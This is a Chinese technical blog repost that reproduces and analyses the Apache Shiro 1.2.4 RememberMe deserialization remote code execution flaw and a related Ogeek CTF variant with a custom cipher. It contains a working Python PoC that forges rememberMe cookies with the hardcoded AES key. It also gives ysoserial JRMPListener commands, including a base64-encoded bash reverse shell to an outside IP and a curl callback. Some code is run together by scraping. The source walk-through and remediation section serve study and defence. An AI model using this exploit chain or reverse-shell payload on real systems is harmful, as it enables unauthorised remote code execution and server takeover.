当前位置:   article > 正文

java 2mi远程执行漏洞_Shiro RememberMe 1.2.4远程代码执行漏洞-详细分析

shiro远程命令执行

本文首发于先知:

0x01.漏洞复现

环境配置

1a4de94cb6dca9592a3941a28c5285f0.png

测试

需要一个vps ip提供rmi注册表服务,此时需要监听vps的1099端口,复现中以本机当作vps使用

poc:

importsysimportuuidimportbase64importsubprocessfrom Crypto.Cipher importAESdefencode_rememberme(command):

popen= subprocess.Popen(['java', '-jar', 'ysoserial.jar', 'JRMPClient', command], stdout=subprocess.PIPE)

BS=AES.block_size

pad= lambda s: s + ((BS - len(s) % BS) * chr(BS - len(s) %BS)).encode()

key= base64.b64decode("kPH+bIxk5D2deZiIxcaaaA==")

iv=uuid.uuid4().bytes

encryptor=AES.new(key, AES.MODE_CBC, iv)

file_body=pad(popen.stdout.read())

base64_ciphertext= base64.b64encode(iv +encryptor.encrypt(file_body))returnbase64_ciphertextif __name__ == '__main__':

payload= encode_rememberme(sys.argv[1])print "rememberMe={0}".format(payload.decode())

此时在vps上执行:

java -cp ysoserial.jar ysoserial.exploit.JRMPListener 1099 CommonsCollections4 'curl 192.168.127.129:2345' //command可以任意指定

此时执行poc可以生成rememberMe的cookie:

61b3a1271c40fcf6f71dc63d102245df.png

此时burp发送payload即可,此时因为poc是curl,因此监听vps的2345端口:

cd621e8906f387fde74e59424edd0cb3.png

此时发送payload即可触发反序列化达到rce的效果

b820325642a9704c3c859a31bfbc90a4.png

如果要反弹shell,此时vps上执行:

java -cp ysoserial.jar ysoserial.exploit.JRMPListener 1099 CommonsCollections4 'bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEyNy4xMjkvMjM0NSAwPiYxIA==}|{base64,-d}|{bash,-i}'

其中反弹shell执行的命令通过base64编码一次

上面的地址可以将bash命令进行base64编码

此时vps监听2345端口,并且生成新的payload进行rememberMe的cookie替换

5f847f58d6f8671d8f304d7fc09eb5a2.png

d997521d538ab4928e3ff13fb0d79b75.png

64d9d65b7e1650a6debbc25942406d5c.png

此时就能够收到shell了

0x02.漏洞分析

这里使用idea来运行环境,直接import maven项目即可,另外要配置一下pom.xml中的以下两项依赖,否则无法识别jsp标签

f99024cfb44e87b42798978c930afd2a.png

生成cookie的过程

shiro会提供rememberme功能,可以通过cookie记录登录用户,从而记录登录用户的身份认证信息,即下次无需登录即可访问。而其中对rememberme的cookie做了加密处理,漏洞主要原因是加密的AES密钥是硬编码在文件中的,那么对于AES加密算法我们已知密钥,并且IV为cookie进行base64解码后的前16个字节,因此我们可以构造任意的可控序列化payload

b87248eadbf17e22b206800f859d6578.png

处理rememberme的cookie的类为org.apache.shiro.web.mgt.CookieRememberMeManager,它继承自org.apache.shiro.mgt.AbstractRememberMeManager,其中在AbstractRememberMeManager中定义了加密cookie所需要使用的密钥,当我们成功登录时,如果勾选了rememberme选项,那么此时将进入onSuccessfulLogin方法

31f2af48589dee04d8efa9f24146dc75.png

6b2faff44baf0b2352cfb8aab6c5b20b.png

接下来将会对登录的认证信息进行序列化并进行加密,其中PrincipalCollection类的实例对象存储着登录的身份信息,而encrypt方法所使用的加密方式正是AES,并且为CBC模式,填充方式为PKCS5

5daa38a0d1f9d84c0266b24e8398d7d6.png

8048e983e8bc24999d413ca8ba87191d.png

其中ByteSource byteSource = cipherService.encrypt(serialized, getEncryptionCipherKey());这里调用的正是AES的encrypt方法,具体的实现在org/apache/shiro/crypto/JcaCipherService.java文件中,其实现了CiperService接口,并具体定义了加密的逻辑

72486e7394a87e4cbbb08b275745ca75.png

在encrypt方法中,就是shiro框架自带的加密流程,可以看到此时将iv放在crtpt()加密的数据之前然后返回

c3b315dbfdbaa6d22fa0b0cc7290392b.png

加密结束后,将在org/apache/shiro/web/mgt/CookieRememberMeManager.java的rememberSerializedIdentity方法中进行base64编码,并通过response返回

0b7665686a55395640b5c69dd4df6961.png

解析cookie的过程

此时将在org/apache/shiro/web/mgt/CookieRememberMeManager.java中将传递的base64字符串进行解码后放到字节数组中,因为java的序列化字符串即为字节数组

byte[] decoded = Base64.decode(base64);

此后将调用org/apache/shiro/mgt/AbstractRememberMeManager.java中的getRememberedPrincipals()方法来从cookie中获取身份信息

8617d0fc3b35eba18b6d52ab4158ed59.png

此时可以看到将cookie中解码的字节数组进行解密,并随后进行反序列化

3418770681bcc96680b997437b728d44.png

其中decrypt方法中就使用了之前硬编码的加密密钥,通过getDecryptionCipherKey()方法获取

dfb40efc95836d055b0662adddde4fcb.png

而我们实际上可以看到其构造方法中实际上定义的加密和解密密钥都是硬编码的密钥

d3ce4a0f465662242185db57d38d0b8e.png

e132341a4f3f70b591afec9ef8326243.png

即为Base64.decode("kPH+bIxk5D2deZiIxcaaaA=="),得到解密的密钥以后将在org/apache/shiro/crypto/JcaCipherService.java的decrypt()方法中进行解密,此时从cookie中取出iv与加密的序列化数据

95bd5b664158bfcc855dcb9111d31f95.png

并在decrypt方法中调用调用crypt方法利用密文,key,iv进行解密

664433d076e809c38394c77227aa0968.png

解密完成后将返回到org/apache/shiro/mgt/AbstractRememberMeManager.java的convertBytesToPrincipals()方法中,此时deserialize(bytes)将对解密的字节数组进行反序列化,而这里的序列化的类是使用DefaultSerialize,即

this.serializer = new DefaultSerializer();

此时将调用deserialize()方法来进行反序列化,在此方法中我们就可以看到熟悉的readObject(),从而触发反序列化

19053c942af03208efe2479af63b6231.png

Ogeek线下java-shiro

这道题中cookie的加密方式实际上不是默认的AES。因为从之前shiro加解密的过程我们已经知道org/apache/shiro/crypto/CipherService.java是个接口,并且在shiro默认的认证过程中,将会通过在shiro加密序列化字节数组时,将会通过getCiperService()方法返回所需要的加密方式,而默认情况下是AES加密

42916edd84bfa0ebdd7ae99a50be471c.png

28dbd31775c5924610dcf88ade2ea8f9.png

e691dbc5375b6eabe16ea297726f1de4.png

那么实际上我们也可以定义自己的加密逻辑,这道题目便是自己实现了CiperService接口并自己实现了一个简单的加密和解密的流程

WEB-INF/classes/com/collection/shiro/crypto/ShiroCipherService.class:

packagecom.collection.shiro.crypto;importjava.io.InputStream;importjava.io.OutputStream;importjava.util.Base64;importjava.util.UUID;importjavax.servlet.http.HttpServletRequest;importorg.apache.shiro.SecurityUtils;importorg.apache.shiro.crypto.CipherService;importorg.apache.shiro.crypto.CryptoException;importorg.apache.shiro.crypto.hash.Md5Hash;importorg.apache.shiro.crypto.hash.Sha1Hash;importorg.apache.shiro.subject.Subject;importorg.apache.shiro.util.ByteSource;importorg.apache.shiro.util.ByteSource.Util;importorg.apache.shiro.web.util.WebUtils;importorg.json.JSONObject;public class ShiroCipherService implementsCipherService {publicShiroCipherService() {

}public ByteSource decrypt(byte[] ciphertext, byte[] key) throwsCryptoException {

String skey= (new Sha1Hash(newString(key))).toString();byte[] bkey =skey.getBytes();byte[] data_bytes = new byte[ciphertext.length];for(int i = 0; i < ciphertext.length; ++i) {

data_bytes[i]= (byte)(ciphertext[i] ^ bkey[i %bkey.length]);

}byte[] jsonData = new byte[ciphertext.length / 2];for(int i = 0; i < jsonData.length; ++i) {

jsonData[i]= (byte)(data_bytes[i * 2] ^ data_bytes[i * 2 + 1]);

}

JSONObject jsonObject= new JSONObject(newString(jsonData));

String serial= (String)jsonObject.get("serialize_data");returnUtil.bytes(Base64.getDecoder().decode(serial));

}public void decrypt(InputStream inputStream, OutputStream outputStream, byte[] bytes) throwsCryptoException {

}public ByteSource encrypt(byte[] plaintext, byte[] key) throwsCryptoException {

String sign= (new Md5Hash(UUID.randomUUID().toString())).toString() + "asfda-92u134-";

Subject subject=SecurityUtils.getSubject();

HttpServletRequest servletRequest=WebUtils.getHttpRequest(subject);

String user_agent= servletRequest.getHeader("User-Agent");

String ip_address= servletRequest.getHeader("X-Forwarded-For");

ip_address= ip_address == null ?servletRequest.getRemoteAddr() : ip_address;

String data= "{\"user_is_login\":\"1\",\"sign\":\"" + sign + "\",\"ip_address\":\"" + ip_address + "\",\"user_agent\":\"" + user_agent + "\",\"serialize_data\":\"" + Base64.getEncoder().encodeToString(plaintext) + "\"}";byte[] data_bytes =data.getBytes();byte[] okey = (new Sha1Hash(newString(key))).toString().getBytes();byte[] mkey = (newSha1Hash(UUID.randomUUID().toString())).toString().getBytes();byte[] out = new byte[2 *data_bytes.length];for(int i = 0; i < data_bytes.length; ++i) {

out[i* 2] = mkey[i %mkey.length];

out[i* 2 + 1] = (byte)(mkey[i % mkey.length] ^data_bytes[i]);

}byte[] result = new byte[out.length];for(int i = 0; i < out.length; ++i) {

result[i]= (byte)(out[i] ^ okey[i %okey.length]);

}returnUtil.bytes(result);

}public void encrypt(InputStream inputStream, OutputStream outputStream, byte[] bytes) throwsCryptoException {

}

}

这里加密的解密的逻辑都有,并且此时encrypt的加密实际上是针对json字符串进行的,解密时也会对json字符串进行同样解密算法,并取其中serialize_data字段的内容进行base64解码以后进行返回,因此我们只要结合ysoserial.jar将生成的payload进行base64编码,并且与放入serialize_data字段中,并且调用此加密逻辑对json字符串进行加密并进行base64编码即可获得rememberme的cookie值,当传送给服务器端后,也将先进行base64解码,然后调用decrypt进行解密,得到json字符串后再将我们放入serialize_data字段中的payload进行反序列化。这里实现的加密也是对称加密,并且通过以下的文件可以看到加解密均是读取服务器上remember.key文件来获取,因此也是硬编码的,因此只要知道该密钥,并且已知加密的逻辑,就可以控制cookie值,来进行反序列化,由下面的逻辑也可以看出初始情况下此密钥为32位

WEB-INF/classes/com/collection/shiro/manager/ShiroRememberManager.class:

packagecom.collection.shiro.manager;importcom.collection.shiro.crypto.ShiroCipherService;importjava.io.BufferedWriter;importjava.io.FileWriter;importjava.io.InputStream;importorg.apache.commons.lang.RandomStringUtils;importorg.apache.shiro.crypto.CipherService;importorg.apache.shiro.crypto.hash.Md5Hash;importorg.apache.shiro.web.mgt.CookieRememberMeManager;public class ShiroRememberManager extendsCookieRememberMeManager {private CipherService cipherService = newShiroCipherService();publicShiroRememberManager() {

}publicCipherService getCipherService() {return this.cipherService;

}public byte[] getEncryptionCipherKey() {return this.getKeyFromConfig();

}public byte[] getDecryptionCipherKey() {return this.getKeyFromConfig();

}private byte[] getKeyFromConfig() {try{

InputStream fileInputStream= this.getClass().getResourceAsStream("remember.key");

String key= "";if (fileInputStream != null && fileInputStream.available() >= 32) {byte[] bytes = new byte[fileInputStream.available()];

fileInputStream.read(bytes);

key= newString(bytes);

fileInputStream.close();

}else{

BufferedWriter writer= new BufferedWriter(new FileWriter(this.getClass().getResource("/").getPath() + "com/collection/shiro/manager/remember.key"));

key= RandomStringUtils.random(32, "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!@#$%^&*()_=");

writer.write(key);

writer.close();

}

key= (newMd5Hash(key)).toString();returnkey.getBytes();

}catch(Exception var4) {

var4.printStackTrace();return null;

}

}

}

0x03.漏洞修复

1.对于shiro的认证过程而言,如果我们使用了硬编码的默认密钥,或者我们自己配置的AES密钥一旦泄露,都有可能面临着反序列化漏洞的风险,因此可以选择不配置硬编码的密钥,那么此情况下shiro将会为我们每次生成一个随机密钥

2.若需要自己生成密钥,官方提供org.apache.shiro.crypto.AbstractSymmetricCipherService#generateNewKey()方法来进行AES的密钥生成

参考

声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/不正经/article/detail/570308
推荐阅读
相关标签
  

闽ICP备14008679号